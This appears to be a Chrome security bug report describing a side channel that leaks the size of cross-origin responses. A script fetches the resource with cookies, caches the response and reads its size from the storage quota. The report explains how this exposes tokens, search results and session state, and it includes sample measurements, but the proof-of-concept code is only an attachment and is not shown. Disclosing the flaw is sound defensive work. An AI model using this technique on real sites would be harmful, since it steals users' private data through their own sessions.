VULNERABILITY DETAILS

Same-origin script has access to perform cross-origin request using fetch while including cookie, save response to the cacheStorage and measure the response size using quota usage (navigator.webkitTemporaryStorage.queryUsageAndQuota). Cross-origin response is using same-origin quota.
	
Any cross-origin HTTPS GET resource response size can be leaked to the attacker. In our attack, we see the content exact size after transmission Transfer-Encoding is processed (response deflated). We even recognize one byte difference in the responses. In contrast to "HTTP Encrypted Information can be Stolen through TCP-windows" (HEIST) attack our attack does not require server side parameter reflection and is stealthy using only a single stable authenticated request measurement.

Using the knowledge of the response sizes we can exfiltrate sensitive information from cross-origin web services while abusing user session. Including 
- steal any custom tokens and private messages whenever server application responses using any custom response compression and a single parameter is reflected. Using similar method like HEIST.
- any GET search form which works using partial search word and has no CSRF-token is vulnerable. The attack works similar as linear comparison attack. Search all single characters candidates, and chose the letter which causes ~largest~ response and then figure out the next letter. Using this method, you can exfiltrate any text which is in the scope of the search.
- test whather user has active session to any web site 
- figure out other knowledge about user session(s)

VERSION
Chrome Version: [54.0.2840.71] [stable]
Operating System: Windows 10

REPRODUCTION CASE

The POC implementation is in the attachment. The implementation must be launched from HTTPS site.

Example run:
URL1: https://example.com/a (Content-Length: 286) .. <h1>Not Found</h1> <p>The requested URL /a was not found on this server.</p> ..
URL2: https://example.com/aa (Content-Length: 287) .. <h1>Not Found</h1> <p>The requested URL /aa was not found on this server.</p> ..

Measurements:
	0.13ms: Targeting URL: https://example.com/a 
	65.69ms: Bytes: 0.000804901123046875MB (=844 bytes) 
	65.90ms: Targeting URL: https://example.com/aa 
	126.31ms: Bytes: 0.0008068084716796875MB (=846 bytes) 
 

Deleted: crossbyteoracle.html 4.7 KB

crossbyteoracle.html 4.7 KB View Download

Deleted: samplerun.txt 1.9 KB

samplerun.txt 1.9 KB View Download